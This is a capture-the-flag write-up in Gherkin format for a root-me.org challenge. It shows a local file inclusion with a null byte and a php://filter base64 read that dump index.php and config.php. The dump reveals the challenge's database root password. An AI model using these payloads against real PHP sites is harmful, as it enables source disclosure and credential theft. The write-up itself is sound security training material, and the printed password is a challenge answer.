## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Ralistic
  User:
    mr_once
  Goal:
    Get the DB root password

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | ArchLinux            | 2020.06.01 |
    | Brave       | 1.10.97 |
  Machine information:
    Given I have the url of the site
    And the vulnerability to exploit
    Then I try to exploit it

  Scenario: Failure: None
    Given the warnings disclosure all the information needed
    And after realize the vulnerability (LFI, null byte attack)
    Then there is no failure scenario

  Scenario: Success: LFI Base64
    Given I am on the website
    And I see the link
    """
    http://challenge01.root-me.org/realiste/ch2/index.php?page=encheres
    """
    Then I see what happens if i append a quote mark to it
    And I get the following warnings
    """
    Warning: include(encheres'.inc.php): failed to open stream: No such file \
    or directory in /challenge/realiste/ch2/index.php on line 54

    Warning: include(): Failed opening 'encheres'.inc.php' for inclusion \
    (include_path='.:/usr/share/php') in /challenge/realiste/ch2/index.php \
    on line 54
    """
    Then I use a null byte to include index.php getting rid of .inc.php
    And it work
    Then I try to read the source code of index.php using Base64 filter
    """
    http://challenge01.root-me.org/realiste/ch2/index.php?page= \
    php://filter/convert.base64-encode/resource=index.php%00
    """
    And I get [evidence](base64.png)
    Then I use base64decode.org to decode the source code
    And I get
    """
    <?php
    # prevent infinite loop when when including index.php (include_once() \
    prevent
    # php://filter from working properly
    if (isset($alreadybeenthere)) {
      return;
    } else {
      $alreadybeenthere = True;
    }

    include("config.php");
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <title></title>
    <link href="style.css" rel="stylesheet" type="text/css"/>
    </head>
    <body>
    <div id="container">
      <!-- header -->
        <div id="header">
          <div id="logo"><a href="#"><span class="orange">PyrAt </span>
          Enchères</a></div>
            <div id="menu">
              <ul>
                <li><a href="index.php" <?php if($page == 'accueil')
                echo 'class="active"' ?> >Accueil</a></li>
                <li><a href="index.php?page=encheres"
                <?php if($page == 'encheres')
                  echo 'class="active"' ?> >Le principe</a></li>
                </ul>
            </div>
        </div>
        <!--end header -->
        <!-- main -->
        <div id="main">
            <div id="content">
            <div id="head_image">
              <div id="slogan"><strong>PyrAt</strong> enchères<br/></div>
                <div id="under_slogan_text">Le site d'enchères inversées
                  <br/>
                  Situé dans les Pyrénnées Atlantiques<br/></div>
            </div>
            <div id="text">
      <?php
      if ( ! isset($_GET['page']) || $_GET["page"] == "index.php\0" ){
          $_GET['page']="accueil";
      }
      if(substr($_GET['page'], strlen($_GET['page']) - 1) == "\0"){
          include(substr($_GET['page'],0,-1));
      } else {
          include($_GET['page'].".inc.php");
      }
      ?>
          </div>
          </div>
        </div>
        <!-- end main -->
        <!-- footer -->
        <div id="footer">
        <div id="left_footer">&copy; Copyright 2010 PyRat Enchères</div>
        <div id="right_footer">
    <!-- Please do not change or delete these links. Read the license! Thanks.
     :-) -->
    <a
    href="http://www.realitysoftware.ca/services/website-development/design/">
    Web design</a> released by <a href="http://www.flash-gallery.org/">
    Flash Gallery
    </a>
        </div>
        </div>
        <!-- end footer -->
    </div>
    </body>
    </html>
    """
    Then I see that index.php includes the file config.php
    And I try to read the source code of config.php
    """
    http://challenge01.root-me.org/realiste/ch2/index.php?page= \
    php://filter/convert.base64-encode/resource=config.php%00
    """
    And after decoding the base64 I get
    """
    <?php
    $hote = "localhost";
    $nomBdd = "site";
    $utilisateur = "root";
    $password = "roxxor1337kik00_";
    ?>
    """
    Then I solve the challenge
